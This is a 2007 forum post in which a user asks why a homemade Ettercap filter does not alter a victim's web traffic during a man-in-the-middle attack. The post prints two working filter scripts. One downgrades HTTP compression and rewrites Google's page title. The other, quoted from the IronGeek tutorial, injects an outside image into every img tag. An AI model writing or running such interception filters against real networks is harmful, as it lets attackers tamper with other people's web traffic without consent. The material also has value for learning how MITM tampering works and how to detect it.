easy ettercap filter

I'm trying to do easy ettercap filter but it doesn't seem to work. The filter is:

if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as orig$
      msg("zapped Accept-Encoding!\n");
   }
}

if (ip.proto == TCP && tcp.src == 80) {
   replace("<title>Google</title>", "<title>Google H4CK3D</title>");
   msg("Filter Ran.\n");
}

The MiM attack works for sure. I can see the traffic going through my laptop.

If I load  Google page on the victims computer, the source page still has  <title>Google</title>.

In Wireshark I can see one request from the Victim with:

Accept-Encoding: gzip,deflate\r\n

and then a second one:

Accept-Rubbish!: gzip,deflate\r\n

but the second request is marked as "TCP out of order". I don't really know what that means.

Then I can see a answer from google containing the  "H4CK3D" title. It's again marked as "TCP out of order".

Anyway, the vicitm's Google page does not contain the modified code.

Ettercap logs "Filter ran".

If I use this filter, from the IronGeek tutorial, it works fine:

if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!"); 
      # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   msg("Filter Ran.\n");
}

This filter is more or less the same so I don't understand why mine doesn't work.

Thanks for your advices.

Kind regards,
Tex

Last edited by Tex-Twil (23-08-2007 07:17:22)